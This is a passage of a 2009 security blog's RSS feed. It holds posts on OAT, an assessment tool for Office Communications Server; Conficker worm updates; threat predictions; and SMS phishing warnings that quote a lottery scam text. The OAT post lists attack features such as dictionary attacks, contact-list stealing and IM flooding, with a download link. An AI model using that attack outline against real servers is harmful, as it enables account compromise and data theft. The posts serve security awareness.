google_color_url = "008000";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
<p><strong>Features</strong></p>
<ul>
<li>Online Dictionary Attack</li>
<li>Presence Stealing</li>
<li>Contact List Stealing</li>
<li>Single User Flood Mode (Internal)</li>
<li>Domain Flood Mode (Internal)</li>
<li>Call Walk (Internal/External)</li>
<li>Play Spam Audio</li>
<li>Detailed Report Generation</li>
</ul>
<p><script type="text/javascript"><!--
google_ad_client = "pub-8241851284410172";
google_ui_features = "rc:0";
google_ad_width = 234;
google_ad_height = 60;
google_ad_format = "234x60_as";
google_ad_type = "text_image";
google_alternate_ad_url = "?adsensem-benice=234x60";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_text = "000000";
google_color_url = "008000";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<br />
<strong>OAT Modes</strong></p>
<p><em><strong>Internal Network Attack Mode</strong></em></p>
<p>Internal Network Mode simulates attacks from the internal IP network, where the attacker has unrestricted access to shared resources and reachability to servers. OCS users are provisioned on a Domain Controller (DC) and can query the DC for data. OAT exploits internal network access by querying the DC for all the communication enabled users. It then adds these users to the attack list.</p>
<p>The following attacks can be performed from the internal network</p>
<ul>
<li> Single user IM Flood</li>
<li>Domain IM Flood</li>
<li>Call Walk</li>
</ul>
<p><script type="text/javascript"><!--
google_ad_client = "pub-8241851284410172";
google_ui_features = "rc:0";
google_ad_width = 234;
google_ad_height = 60;
google_ad_format = "234x60_as";
google_ad_type = "text_image";
google_alternate_ad_url = "?adsensem-benice=234x60";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_text = "000000";
google_color_url = "008000";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
<p><em><strong>External Network Attack Mode</strong></em></p>
<p>External Network Attack Mode simulates the real world attack scenario in which an attacker is outside of the corporate IP network. An attacker sourced from outside of the firewall can not directly query the DC unless they know its hostname.</p>
<p>Once the Dictionary attack is successful against target user, OAT functions like a legitimate OCS client, registering itself with Office Communication Server. Once registered, OAT queries for the contact list of target user and uses this information to create a victim target list. This information is useful for the next attack phase.</p>
<p>The following tests can be performed from the external network</p>
<ul>
<li>Contact List Stealing</li>
<li>List IM Flood</li>
<li> Call Walking</li>
</ul>
<p>You can download OAT here:</p>
<p><a href="http://sourceforge.net/project/downloading.php?group_id=245890&amp;filename=OAT1.0.zip">OAT1.0.zip</a></p>
<p>Or read more <a href="http://voat.sourceforge.net/">here</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/04/27/oat-ocs-assessment-tool-office-communication-server-security-assessment-tool/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>10 security threats to watch out for in 2009</title>
		<link>http://techblog.cyberphunkz.com/2009/04/22/10-security-threats-to-watch-out-for-in-2009/</link>
		<comments>http://techblog.cyberphunkz.com/2009/04/22/10-security-threats-to-watch-out-for-in-2009/#comments</comments>
		<pubDate>Wed, 22 Apr 2009 17:39:53 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[attack]]></category>
		<category><![CDATA[hyperjacking]]></category>
		<category><![CDATA[social networking]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=104</guid>
		<description><![CDATA[We’re well into the new year now, and we’re beginning to see trends emerging on the security front. Some of the threats we’ll see this year will be similar to those in years past (after all, many of the basic con games now being perpetuated online were around long before the advent of computers and &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/04/22/10-security-threats-to-watch-out-for-in-2009/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>We’re well into the new year now, and we’re beginning to see trends emerging on the security front. Some of the threats we’ll see this year will be similar to those in years past (after all, many of the basic con games now being perpetuated online were around long before the advent of computers and the Internet). However, attackers are becoming much more sophisticated in their methods to circumvent the increased levels of security built into operating systems and applications. Here are 10 security threats that are likely to become more prominent in 2009.</p>
<p> </p>
<p> </p>
<h2>1: Social networking as an avenue of attack</h2>
<p>Social networking has experienced a boom in popularity over the last few years. It’s now finding its way from the home into the workplace and up the generational ladder from the young folks into the mainstream. It’s a great way to stay in touch in a mobile society, and it can be a good tool for making business contacts and disseminating information to groups. However, popular social networking sites have been the target of attacks and scammers. Many people let their hair down when posting on these sites and share much more personal data (and even company data) than they should.</p>
<p>Think you’ll solve the problem just by blocking social networking sites on your company network? Not so fast. As Steve Riley pointed out in his recent talk on attack progressions at the 2009 MVP Summit, today’s young professionals are growing up with social networking, and they expect to have it available to them at work just as older employees expect to be able to use their office telephones for reasonable, limited personal calls. In addition, you lose the business benefits of social networking if you shut it down completely. After all, companies didn’t shut down e-mail because it could present a security threat. A better approach is to educate your workers about social networking practices and develop policies governing social media use. As an example, take a look at Intel’s <a href="http://www.intel.com/sites/sitewide/en_US/social-media.htm" target="_blank">Social Media Guidelines</a>.</p>
<h2>2: More attacks on the integrity of the data<span id="more-104"></span></h2>
<p>Another point Steve made in his presentation is that “First they came for bandwidth; now they want to make a difference.” In the past, many attackers were looking for a free ride on your Internet connection (for example, by connecting to your wireless network and using it to access the Web, send e-mail, etc.). Then the nature of attacks progressed. Instead of the network being the target, it was the data. The next step was stealing data, but step after that is even more insidious: the malicious modification of data (making a difference).</p>
<p>This can result in catastrophic consequences: personal, financial, or even physical. If a hacker changed the information in a message to your spouse, it could harm your marriage. If the change were to a message to your boss, you might lose your job. Changing information on a reputable Web site regarding a company’s financial state could cause its stock prices to drop. A change to electronic medication orders on a hospital network could result in a patient’s death.</p>
<h2>3: Attacks on mobile devices</h2>
<p>Laptop computers have presented a known security risk for many years. Today, we are more mobile than ever, carrying important data around with us not just when we go on business trips but every day, everywhere we go, on smart phones that are really just small handheld computers. These devices have important business and personal e-mail, text messages, documents, contact information and personal information stored on them. Many of them have 8 or 16 GB of internal storage and you can add another 32 GB on a micro SD card. That’s much more storage space than the typical desktop computer had in the 1990s.</p>
<p>People lose their phones all the time, but many of these devices aren’t configured to require a password to start the system, the data on them isn’t encrypted, and very few protective measures have been taken. They are security disasters waiting to happen. Businesses should develop policies regarding the storage of company information on smartphones and require encryption of data on internal storage and on flash cards, strong passwords, use of phones that can be remotely wiped when lost, etc. Of course, you don’t have to lose the phone to have its data stolen. Attention should also be paid to the potential for attacks using Bluetooth and Wi-fi.</p>
<h2>4: Virtualization</h2>
<p>Virtualized environments are becoming commonplace in the business world. Server consolidation is a popular use of virtualization technologies. Desktop virtualization, application virtualization, presentation virtualization — all of these provide ways to save money, save space, and increase convenience for users and IT administrators alike. If it’s properly deployed, virtualization can even increase security — but that’s a big “if.” Virtualization makes security more complicated because it introduces another layer that must be secured. In essence, you now have to worry about two attack surfaces: the virtual machine and the physical machine on which it runs. And when you have multiple VMs running on a hypervisor, a compromise of the hypervisor could compromise all of those machines.</p>
<p>Another virtualization-related threat was demonstrated by the infamous Blue Pill VM rootkit. Hyperjacking is a form of attack by which the attacker installs a rogue hypervisor to take complete control of a server, and VM jumping/Guest hopping exploits hypervisor vulnerabilities to gain access to one host from another.</p>
<p>The easy portability of virtual images also presents a security issue. With modern virtualization technology, VMs can be easily cloned and installed to a different physical machine. The ability to go back to “snapshots” of past images can inadvertently wreak havoc with patch management.</p>
<h2>5: Cloud computing</h2>
<p>If virtualization was last year’s buzzword, this year it’s all about “the Cloud.” The uncertain economy and tight budgets have companies looking for ways to lower operating costs, and outsourcing e-mail, data storage, application delivery, and more to cloud providers can present some attractive potential savings. Microsoft, IBM, Google, Amazon, and other major companies are investing millions in cloud services.</p>
<p>Cloud advocates envision a day when we’ll all use inexpensive terminals to access our resources that are located someplace “out there.” But when your data is “out there,” how can you be sure that it’s protected from everyone else “out there?” In fact, the biggest obstacle to moving to the cloud, for many companies and individuals, is the security question. <a href="http://cloudsecurity.org/2008/10/14/biggest-cloud-challenge-security/" target="_blank">IDC recently surveyed 244 IT executives and CIOs</a> about their attitudes toward cloud services, and 74.6% said security is the biggest challenge for the cloud computing model.</p>
<p>Google, a prominent player in the cloud space, is the subject of a recent complaint to the Federal Trade Commission (FTC) by the Electronic Privacy Information Center (EPIC), which seeks <a href="http://blogs.zdnet.com/BTL/?p=14792" target="_blank">a suspension of Google’s cloud computing services</a> until verifiable safeguards are established.</p>
<h2>6: More targeted attacks on non-Windows operating systems</h2>
<p>Although Windows still has 91% of the desktop OS market, there has been a big push in some quarters to deploy Linux or Macintosh as a supposedly more secure alternative. But are they really? One reason the non-Windows operating systems have enjoyed fewer attacks is the simple fact that the Windows installed base presents a much bigger target for attackers. Just as terrorists prefer to attack large gatherings of people where they can do the most damage, so do hackers prefer to write malware that will spread to the greatest number of computers — and that means Windows.</p>
<p>However, as other systems get more publicity and become more popular, they also become more attractive to the bad guys. Malware has been becoming less Windows-centric for the last few years; the 2007 Open Office worm, for example, infected Linux and Mac OS X systems as well as Windows. And <a href="http://blogs.zdnet.com/security/?p=2941" target="_blank">Charlie Miller</a>, a security researcher who won a recent hacking contest by breaking into a fully patched MacBook in a few seconds, said, “Hacking into Macs is so much easier. You don’t have to jump through hoops and deal with all the anti-exploit mitigations you’d find in Windows.”</p>
<p>Whatever the reality, the perception is that non-Windows operating systems are becoming more popular as Apple steps up its advertising campaign and vendors offer more netbooks preinstalled with Linux. As they become more high profile, look for hackers to spend more time and energy creating attacks that target non-Windows systems.</p>
<h2>7: Third-party applications</h2>
<p>Microsoft has put tremendous effort into securing the Windows operating system and its popular productivity applications, such as Microsoft Office. Linux and Mac receive regular security updates. As operating systems become more and more secure, attackers will focus less on OS exploits and more on application exploits. The major Web browsers are routinely updated to patch security vulnerabilities. But the vendors of many third-party applications are less security-aware. This is especially true of freeware applications written by independent developers. These programs, which may not have been written with security in mind to begin with and which do not automatically check for and download security updates, present an opportunity that we can expect attackers to take advantage of.</p>
<h2>8: Side effects of green computing</h2>
<p>Green computing is all the rage today, and saving energy is certainly a good thing — but as with beneficial medications, there can be unexpected and unwanted side effects. Recycling computer components, for instance, can expose sensitive data to strangers if you don’t ensure that hard drives have really been wiped cleaning. (Hint: Deleting files or even formatting disks doesn’t guarantee that the data is gone.)</p>
<p>On the other hand, such green initiatives as powering down systems that aren’t in use can actually enhance security, since a computer that’s turned off isn’t exposed to the network and isn’t accessible 24/7.</p>
<h2>9: IP convergence</h2>
<p>Convergence is the name of the game today, and we are seeing a melding of different technologies on the IP network. With our phones, cable TV boxes, Blu-ray players, game consoles, and even our washing machines connected to the network, we’re able to do things we never even imagined a decade ago. But all of those devices on an Internet-connected network present myriad “ways in” for an attacker that didn’t exist when only our computers used IP.</p>
<p>We can only hope that the manufacturers of all these devices put security at the forefront; otherwise, we may see a rash of new malware targeting vulnerabilities in our entertainment devices and household appliances.</p>
<h2>10: Overconfidence</h2>
<p>Perhaps the greatest threat to the security of our networks, whether at work or at home, is overconfidence in our security solutions. Many home users believe that as long as they have a firewall and antivirus installed, they don’t have to worry about security. Businesses tend to put too much faith in the latest and greatest security solutions. For example, there is an assumption that biometric authentication is infallible and undefeatable — but it can<em> </em>be compromised in various ways, and when it is, the legitimate user it was meant to protect becomes the victim. If the system shows that <em>your </em>fingerprint was used to log on, you may be presumed guilty, and an investigation might not even be deemed necessary.</p>
<p>Another type of overconfidence is common among home users and in the business environment, especially with small companies. That’s the idea that “We don’t have anything worth hacking into so we don’t need to worry about security.” In today’s interconnected world, neglecting security doesn’t just put you<em> </em>at risk; it also puts others at risk. Your systems could be used as zombies to attack a whole different network.</p>
<p>End users on a business network often think of security as somebody else’s problem and operate on the assumption that the IT department is taking care of them, so they don’t have to do anything about security.</p>
<p>Overconfidence of any type is a dangerous security threat — but it’s one that you can most easily do something about because it doesn’t require expensive technology or sophisticated technical skills — just a change in attitude. We all have a responsibility to keep our own systems as secure as possible.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/04/22/10-security-threats-to-watch-out-for-in-2009/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Iron Mountain &#8211; The Most Secure Civilian Facility IN Earth</title>
		<link>http://techblog.cyberphunkz.com/2009/04/17/iron-mountain-the-most-secure-civilian-facility-in-earth/</link>
		<comments>http://techblog.cyberphunkz.com/2009/04/17/iron-mountain-the-most-secure-civilian-facility-in-earth/#comments</comments>
		<pubDate>Fri, 17 Apr 2009 13:42:25 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[cool]]></category>
		<category><![CDATA[vault]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=89</guid>
		<description><![CDATA[You know how people are always talking about Ft. Knox being really secure? Well, here is the civilian equivalent! Iron Mountain Inc is a company specializing in data storage. The best known Iron Mountain storage facility is a high-security cave in a former limestone mine at Boyers, Pennsylvania near the city of Butler in the USA. &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/04/17/iron-mountain-the-most-secure-civilian-facility-in-earth/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>You know how people are always talking about Ft. Knox being really secure? Well, here is the civilian equivalent!</p>
<p><a href="http://www.google.com/url?sa=t&amp;ct=res&amp;cd=1&amp;url=http%3A%2F%2Fwww.ironmountain.com%2F&amp;ei=vtQnSP7FFJSi8AS-qqDKCw&amp;usg=AFQjCNHqSE-5sZ8B2-EG0g2C6ZPPBVZSwA&amp;sig2=W0MDC0tISduV8HHQWos6nQ">Iron Mountain Inc</a> is a company specializing in data storage. The best known Iron Mountain storage facility is a high-security cave in a former limestone mine at Boyers, Pennsylvania near the city of Butler in the USA.</p>
<p>It has been in operation since 1950, and it is here that Bill Gates stores his Corbis photographic collection in a refrigerated cave 220 feet underground.</p>
<p> </p>
<p><object width="445" height="364" data="http://www.youtube-nocookie.com/v/2aou6c2MOmg&amp;hl=en&amp;fs=1&amp;rel=0&amp;color1=0x006699&amp;color2=0x54abd6&amp;border=1" type="application/x-shockwave-flash"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube-nocookie.com/v/2aou6c2MOmg&amp;hl=en&amp;fs=1&amp;rel=0&amp;color1=0x006699&amp;color2=0x54abd6&amp;border=1" /><param name="allowfullscreen" value="true" /></object></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/04/17/iron-mountain-the-most-secure-civilian-facility-in-earth/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Conficker Worm Awakens, Downloads Rogue Anti-virus Software</title>
		<link>http://techblog.cyberphunkz.com/2009/04/13/conficker-worm-awakens-downloads-rogue-anti-virus-software/</link>
		<comments>http://techblog.cyberphunkz.com/2009/04/13/conficker-worm-awakens-downloads-rogue-anti-virus-software/#comments</comments>
		<pubDate>Mon, 13 Apr 2009 13:35:45 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[conficker]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=82</guid>
		<description><![CDATA[  Security experts nervously watching computers infested with the prolific Conficker computer worm say they have begun seeing infected hosts downloading additional software, including a new rogue anti-virus product. Since its debut late last year, the collection of hundreds of thousands &#8211; if not millions &#8211; of systems sick with Conficker has somewhat baffled security researchers, who &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/04/13/conficker-worm-awakens-downloads-rogue-anti-virus-software/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p> </p>
<p>Security experts nervously watching computers infested with the prolific <strong>Conficker</strong> computer worm say they have begun seeing infected hosts downloading additional software, including a new rogue anti-virus product.</p>
<p>Since its debut late last year, the collection of hundreds of thousands &#8211; if not millions &#8211; of systems sick with Conficker has somewhat baffled security researchers, who are accustomed to seeing such massive networks being used for money-making criminal activities, such as relaying junk e-mail.</p>
<p>Today, however, that mystery evaporated, as anti-virus companies reported seeing Conficker systems being updated with <strong>SpywareProtect2009</strong>, a so-called &#8220;scareware&#8221; product that uses fake security alerts to frighten consumers into paying for bogus computer security software.</p>
<p>According to <strong>Kaspersky Labs</strong>, once the scareware is downloaded, the victim will see the usual warnings, &#8220;which naturally asks if you want to remove the threats it&#8217;s &#8216;detected&#8217;. Of course, this service comes at a price &#8211; $49.95.&#8221; Kaspersky reports that the rogue anti-virus product is being downloaded from a Web server in Ukraine.</p>
<p>This development adds an interesting wrinkle. The first version of Conficker contained within its genetic makeup instructions telling infected systems to visit a site called <strong>TrafficConverter.biz</strong>. As I noted last month, this was a site where distributors of rogue anti-virus products would go for the latest programs and links to the latest download locations. Many affiliates were making six-figure paychecks each month distributing this worthless software by various means, all of them extremely sneaky if not downright illegal.</p>
<p><img class="alignnone size-full wp-image-83" title="conficker1" src="http://techblog.cyberphunkz.com/wp-content/uploads/2009/04/conficker1.png" alt="conficker1" width="424" height="273" /></p>
<p>In its <a href="http://voices.washingtonpost.com/securityfix/2009/04/microsoft_cites_dramatic_rise.html">bi-annual security report</a> released this week, Microsoft cited rogue anti-virus as one of the most prolific and fastest-growing threats facing Windows users today.</p>
<p>The rogue anti-virus software, however, was not the only piece of rubbish to be sent to Conficker infected systems this week. Researchers at <strong>Trend Micro</strong> <a href="http://blog.trendmicro.com/downadconficker-watch-new-variant-in-the-mix/">reported the first stirrings of Conficker.C</a> on Wednesday, when they noticed a new file show up in the temporary director of a number of test machines they&#8217;d infected with the worm. They later determined the file had been placed there via Conficker&#8217;s built-in peer-to-peer (P2P) communications capability, which allows large groupings of infected systems to hand off software updates and instructions being pushed out by the worm authors.</p>
<p>Trend found that the update was a version of the <a href="http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20090119">Waledac</a> family of spam Trojans. Due to similarities in the code and other telltale signs, researchers consider Waledac to be the reincarnation of the &#8220;Storm worm,&#8221; a spam virus that also used a sophisticated P2P mechanism to spread and share updates.</p>
<p>The Conficker update also sets up a Web server on the infected system, re-enables the ability to spread itself through the <a href="http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx">Microsoft Windows vulnerability</a> that caused the outbreak in the first place (this spreading capability was absent in the Conficker version prior to this update). It also instructs the Waledac component to remove itself if the date is on or after May 3, 2009.</p>
<p>Perhaps that is due to some ill-understood logic within Conficker, but not all of the systems infected with Conficker.C are receiving the latest updates, said <strong>Paul Ferguson</strong>, an advanced threat researcher at Trend.</p>
<p>&#8220;We&#8217;ve seen it happen very slow and staggered,&#8221; he said. &#8220;We have several nodes that have it and several that don&#8217;t.&#8221;</p>
<p>Ferguson said there are still several components tucked away in this Conficker update that researchers are struggling to unlock. But he said it&#8217;s evident the worm&#8217;s authors are ready to start putting it to work.</p>
<p>&#8220;There are still some unknowns here, but things are becoming a lot more clear, and it certainly seems they&#8217;re making a move here to finally monetize all this effort,&#8221; Ferguson said</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/04/13/conficker-worm-awakens-downloads-rogue-anti-virus-software/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Conficker wakes up, updates via P2P, drops payload</title>
		<link>http://techblog.cyberphunkz.com/2009/04/10/conficker-wakes-up-updates-via-p2p-drops-payload/</link>
		<comments>http://techblog.cyberphunkz.com/2009/04/10/conficker-wakes-up-updates-via-p2p-drops-payload/#comments</comments>
		<pubDate>Fri, 10 Apr 2009 16:23:06 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[conficker]]></category>
		<category><![CDATA[p2p]]></category>
		<category><![CDATA[worm]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=76</guid>
		<description><![CDATA[The Conficker worm is finally doing something&#8211;updating via peer-to-peer between infected computers and dropping a mystery payload on infected computers, Trend Micro said on Wednesday. Researchers were analyzing the code of the software that is being dropped onto infected computers but suspect that it is a keystroke logger or some other program designed to steal &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/04/10/conficker-wakes-up-updates-via-p2p-drops-payload/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>The Conficker worm is finally doing something&#8211;updating via peer-to-peer between infected computers and dropping a mystery payload on infected computers, Trend Micro said on Wednesday.</p>
<p>Researchers were analyzing the code of the software that is being dropped onto infected computers but suspect that it is a keystroke logger or some other program designed to steal sensitive data off the machine, said David Perry, global director of security education at Trend Micro.</p>
<p> </p>
<div class="cnet-image-div image-medium float-right"><img class="cnet-image alignright" src="http://i.i.com.com/cnwk.1d/i/bto/20090409/Security.jpg" alt="" width="184" height="138" /></div>
<p> </p>
<p>The software appeared to be a .sys component hiding behind a rootkit, which is software that is designed to hide the fact that a computer has been compromised, according to Trend Micro. The software is heavily encrypted, which makes code analysis difficult, the researchers said.</p>
<p>The worm also tries to connect to MySpace.com, MSN.com, eBay.com, CNN.com and AOL.com as a way to test that the computer has Internet connectivity, deletes all traces of itself in the host machine, and is set to shut down on May 3, according to the <a href="http://blog.trendmicro.com/downadconficker-watch-new-variant-in-the-mix/">TrendLabs Malware Blog</a>.</p>
<p>Because infected computers are receiving the new component in a staggered manner rather than all at once there should be no disruption to the Web sites the computers visit, said Paul Ferguson, advanced threats researcher for Trend Micro.</p>
<p>&#8220;After May 3, it shuts down and won&#8217;t do any replication,&#8221; Perry said. However, infected computers could still be remotely controlled to do something else, he added.</p>
<p>Last night Trend Micro researchers noticed a new file in the Windows Temp folder and a huge encrypted TCP response from a known Conficker P2P IP node hosted in Korea.</p>
<p>&#8220;As expected, the P2P communications of the Downad/Conficker botnet may have just been used to serve an update, and not via HTTP,&#8221; the blog post says. &#8220;The Conficker/Downad P2P communications is now running in full swing!&#8221;</p>
<p>In addition to adding the new propagation functionality, Conficker communicates with servers that are associated with the Waledac family of malware and its Storm botnet, according to <a href="http://countermeasures.trendmicro.eu/new-downadconficker-variant-spreading-over-p2p/">a separate blog post</a> by Trend Micro security researcher Rik Ferguson.</p>
<p>The worm tries to access a known Waledac domain and download another encrypted file, the researchers said.</p>
<p>Conficker.C failed to make a splash a week ago despite the fact that it was programmed to activate on April 1. It has infected between 3 million and 12 million computers, according to Perry.</p>
<p>Initially, researchers thought they were seeing a new variant of the Conficker worm, but now they believe it is merely a new component of the worm.</p>
<p>The worm spreads via a hole in Windows that Microsoft <a href="http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx">patched in October</a>, as well as through removable storage devices and network shares with weak passwords.</p>
<p>The worm disabled security software and blocks access to security Web sites. To check if your computer is infected you can use this <a href="http://www.confickerworkinggroup.org/infection_test/cfeyechart.html">Conficker Eye Chart</a> or <a href="http://iv.cs.uni-bonn.de/fileadmin/user_upload/werner/cfdetector/">this site at the University of Bonn</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/04/10/conficker-wakes-up-updates-via-p2p-drops-payload/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Phishing Via SmShing</title>
		<link>http://techblog.cyberphunkz.com/2009/04/01/phishing-via-smshing/</link>
		<comments>http://techblog.cyberphunkz.com/2009/04/01/phishing-via-smshing/#comments</comments>
		<pubDate>Wed, 01 Apr 2009 08:27:29 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[sms]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=56</guid>
		<description><![CDATA[The problem of phishing is becoming a major problem on the mobile phones these days. So better be alert the next time you receive a message or a call from your mobile operator asking you to call a certain number to unsubscribe a certain service. There is a strong possibility of it being a phishing &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/04/01/phishing-via-smshing/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p class="MsoNormal"><span>The problem of phishing is becoming a major problem on the mobile phones these days. So better be alert the next time you receive a message or a call from your mobile operator asking you to call a certain number to unsubscribe a certain service. There is a strong possibility of it being a phishing message. </span></p>
<p>The SMS phishing or simply SMiShing is similar to spam emails that take computer users to illegitimate website posing as an authentic one. SMS phishing too is designed to fool the mobile user into visiting a phished site by sending an SMS falsely appearing to be from a trustworthy entity.</p>
<p class="MsoNormal"><span> Many people in India assume that when an SMS displays a particular name in the from field. It has to be from that person, what people dont know that for as little as INR 1000 you can have your own name in the from field and the SMS can be sent for as low as INR 0.08 per SMS.</span></p>
<p class="MsoNormal"><span>There have been many cases when mobile owners have fallen in this SMS phishing trap that led to the leakage of crucial information like user names, passwords and credit card numbers. SMS phishing or SMiShing is designed to misguide a person into visiting a website, whereas vishing will instruct him / her to call a number such as the customer care number of a telecom service provider and so on. In reality such a call is routed to a hacker. </span></p>
<p>The increasing popularity and use of the mobile phone has resulted in the rise of crimes like SMiShing and voice phishing alongside. The previous year India ranked third as it witnessed about 9.39 per cent of the total phishing incidents reported globally.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/04/01/phishing-via-smshing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>BEWARE : New wave of SMS Phishing</title>
		<link>http://techblog.cyberphunkz.com/2009/03/30/beware-new-wave-of-sms-phishing/</link>
		<comments>http://techblog.cyberphunkz.com/2009/03/30/beware-new-wave-of-sms-phishing/#comments</comments>
		<pubDate>Mon, 30 Mar 2009 08:32:37 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[Hoaxes]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[hoax]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[scam]]></category>
		<category><![CDATA[sms]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=54</guid>
		<description><![CDATA[Article taken from IT and Related Security News Update from Centre for Research and Prevention of Computer Crimes, India  (www.crpcc.in) Courtesy &#8211; Sysman Computers Private Limited, Mumbai(www.sysman.in) March 30, 2009 Editor &#8211; Rakesh Goyal (rakesh@sysman.in) BEWARE : New wave of SMS Phishing Ankur and Pallavi with CRPCC Team 29 March 2009   Just yesterday, Sudha got an SMS on her mobile, stating   You &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/03/30/beware-new-wave-of-sms-phishing/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>Article taken from IT and Related Security News Update from</p>
<p><span style="font-size: x-small;"><span><span><span><span></span></span></span></span></span></p>
<div><span style="font-size: x-small;"><span style="font-family: Arial;"><span><span style="color: #000080;"><strong>Centre for Research and Prevention of Computer Crimes, India</strong></span></span></span></span></div>
<div>
<p align="center"><span><span style="font-family: Arial;"><strong> </strong><span><span style="font-size: medium;">(</span><span style="font-size: medium;"><a href="http://www.crpcc.in/" target="_blank">www.crpcc.in</a></span><span style="font-size: medium;">)</span></span></span></span></p>
</div>
<div><span><span style="font-size: medium;"><span style="font-family: Arial;"><strong><span style="color: #800000;">Courtesy &#8211; Sysman Computers Private Limited, Mumbai</span>(</strong></span></span><span style="font-family: Arial; font-size: medium;"><strong><a href="http://www.sysman.in/" target="_blank">www.sysman.in</a></strong></span><span style="font-family: Arial; font-size: medium;"><strong>)</strong></span></span></div>
<div>
<p align="center"><span><span style="font-family: Arial;"><span style="color: #0000ff;"><span><span><span><span><span><strong><span>March</span> <span>30</span></strong></span></span></span></span><strong>,</strong></span><strong> 200<span>9</span></strong></span></span></span></p>
<p><span><span style="font-family: Arial;"><span style="color: #0000ff;"></p>
<p align="center"><span><span style="font-family: Arial;"><span><strong><span style="color: #000080;">Editor &#8211; Rakesh Goyal (</span></strong><a href="mailto:rakesh@sysman.in" target="_blank"><strong><span style="color: #000080;">rakesh@sysman.in</span></strong></a><strong><span style="color: #000080;">)</span></strong></span></span></span></p>
<p></span></span></span></div>
<p><span><strong><span>BEWARE :</span></strong></span><strong><span> New wave of SMS Phishing</span></strong><strong></strong></p>
<p><span>Ankur and <span>Pallavi</span> with CRPCC Team</span></p>
<p><span>29 March 2009</span></p>
<p><span> </span></p>
<p><span>Just yesterday, <span>Sudha</span> got an SMS on her mobile, stating</span></p>
<p><span> </span></p>
<p><strong><em><span>You have won GBP 500,000.00 in 2009 on going (o2TELECOMS<span>)INT’L</span> mobile draws in UK. To claim contact: Dr. Steve Mark on +447031844919 or<a href="mailto:mobile.draw@live.com" target="_blank"><span>mobile.draw@live.com</span></a></span></em></strong></p>
<p><span> </span></p>
<p><span>On reading the message, she was very happy and distributing sweets.</span></p>
<p><span> </span></p>
<p><span>On asking the reason for distribution of sweets, she showed the above message.</span></p>
<p><span> </span></p>
<p><span>I told her to keep away from this as this is pure SMS 419 (Advance Fee) and Phishing scam. It was explained to her and all of a sudden, she felt sad to loose the happiness of winning a lottery.</span></p>
<p><span> </span></p>
<p><span>This is the new wave of Phishing and 419 (Advance fee) frauds, started by fraudsters in India.</span></p>
<p><span> </span></p>
<p><span>Another person, Manish, responded with a e-mail and get a reply to furnish –</span></p>
<p><span> </span></p>
<p><span><span>1.<span>    </span></span></span><span><span>A proof of your identity [copy of your driver's license or international passport]</span></span></p>
<p><span><span>2.<span>    </span></span></span><span><span>Proof of winning [the certificate of award issued to you by (o2tele)</span></span></p>
<p><span><span>3.<span>    </span></span></span><span><span>A fund Release Order [F.R.O] from the financial services authority.</span></span></p>
<p><span> </span></p>
